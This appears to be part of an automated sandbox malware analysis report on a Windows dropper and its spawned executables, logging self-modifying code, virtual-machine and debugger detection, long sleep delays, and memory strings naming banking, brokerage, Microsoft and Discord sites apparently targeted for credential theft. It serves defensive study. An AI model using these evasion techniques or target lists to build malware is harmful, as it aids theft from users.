Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: CD3C30 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E83CA8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F02D14 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Special instruction interceptor: First address: 19EC76 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Special instruction interceptor: First address: 19EB67 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Special instruction interceptor: First address: 3C53FC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Special instruction interceptor: First address: 701BAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Special instruction interceptor: First address: 8C75BF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Special instruction interceptor: First address: 8A741A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 7FEC76 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 7FEB67 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Special instruction interceptor: First address: A9DD08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: A253FC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Special instruction interceptor: First address: C48BE0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Special instruction interceptor: First address: 92A497 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Special instruction interceptor: First address: C47740 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Special instruction interceptor: First address: A9B512 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Special instruction interceptor: First address: CF176C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Special instruction interceptor: First address: AA4CC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Special instruction interceptor: First address: AA4F9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Special instruction interceptor: First address: 893C30 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Special instruction interceptor: First address: A43CA8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Special instruction interceptor: First address: AC2D14 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Special instruction interceptor: First address: 2A1BAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Special instruction interceptor: First address: 4675BF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Special instruction interceptor: First address: 44741A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Special instruction interceptor: First address: 4CA497 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Special instruction interceptor: First address: 88EC76 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Special instruction interceptor: First address: 88EB67 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Special instruction interceptor: First address: AB53FC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Special instruction interceptor: First address: 1081BAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Special instruction interceptor: First address: 12475BF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Special instruction interceptor: First address: 122741A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Special instruction interceptor: First address: 12AA497 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Special instruction interceptor: First address: 6EDD08 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Special instruction interceptor: First address: 898BE0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Special instruction interceptor: First address: 897740 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Special instruction interceptor: First address: 6EB512 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Special instruction interceptor: First address: 94176C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Special instruction interceptor: First address: 6F4CC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Special instruction interceptor: First address: 6F4F9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Special instruction interceptor: First address: 67EC76 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Special instruction interceptor: First address: 67EB67 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Special instruction interceptor: First address: 8A53FC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Memory allocated: 4ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Memory allocated: 51F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Memory allocated: 71F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Memory allocated: 4C40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Memory allocated: 4E60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Memory allocated: 4CB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Code function: 3_2_05030424 rdtsc 3_2_05030424
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Code function: 6_2_00C33BB6 sidt fword ptr [esp-02h] 6_2_00C33BB6
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1227
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1241
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1248
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1265
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Window / User API: threadDelayed 502
Source: C:\Users\user\Desktop\file.exe TID: 1908 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe TID: 3924 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2432 Thread sleep count: 53 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2432 Thread sleep time: -106053s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5704 Thread sleep count: 1227 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5704 Thread sleep time: -2455227s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2744 Thread sleep count: 347 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2744 Thread sleep time: -10410000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 616 Thread sleep count: 1241 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 616 Thread sleep time: -2483241s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1128 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 716 Thread sleep count: 1248 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 716 Thread sleep time: -2497248s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2528 Thread sleep count: 1265 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2528 Thread sleep time: -2531265s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe TID: 7120 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe TID: 5096 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe TID: 1916 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe TID: 5636 Thread sleep time: -270000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe TID: 2396 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe TID: 3424 Thread sleep time: -138000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe TID: 5204 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Thread delayed: delay time: 922337203685477
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: ST44OD0PMG8MCMYJRN4.exe, ST44OD0PMG8MCMYJRN4.exe, 00000003.00000002.2368194252.000000000031E000.00000040.00000001.01000000.00000006.sdmp, 9NWW1UIUAOJA8NFOZHWEDA.exe, 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2409428853.0000000000881000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, skotes.exe, 00000005.00000002.2404972213.000000000097E000.00000040.00000001.01000000.0000000A.sdmp, M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, 00000006.00000002.2505747838.0000000000C27000.00000040.00000001.01000000.0000000B.sdmp, 26e226f915.exe, 26e226f915.exe, 0000000B.00000002.2902072979.0000000000A19000.00000040.00000001.01000000.0000000F.sdmp, ef2532c0b1.exe, ef2532c0b1.exe, 0000000C.00000002.3013331115.0000000000421000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 26e226f915.exe, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292795200.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: 26e226f915.exe, 0000000D.00000003.3070418121.0000000005EE8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: 26e226f915.exe, 0000000B.00000003.2901522746.0000000001179000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904685604.0000000001179000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnY
Source: file.exe, 00000000.00000003.2142391592.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134302834.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134448591.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142550438.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_
Source: 26e226f915.exe, 0000000B.00000002.2904278824.00000000010FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.000000000159E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware6N
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.000000000159E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: ST44OD0PMG8MCMYJRN4.exe, 00000003.00000002.2368194252.000000000031E000.00000040.00000001.01000000.00000006.sdmp, 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2409428853.0000000000881000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 00000005.00000002.2404972213.000000000097E000.00000040.00000001.01000000.0000000A.sdmp, M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, 00000006.00000002.2505747838.0000000000C27000.00000040.00000001.01000000.0000000B.sdmp, 26e226f915.exe, 0000000B.00000002.2902072979.0000000000A19000.00000040.00000001.01000000.0000000F.sdmp, ef2532c0b1.exe, 0000000C.00000002.3013331115.0000000000421000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 26e226f915.exe, 0000001C.00000003.3177300154.00000000059B5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Process queried: DebugPort
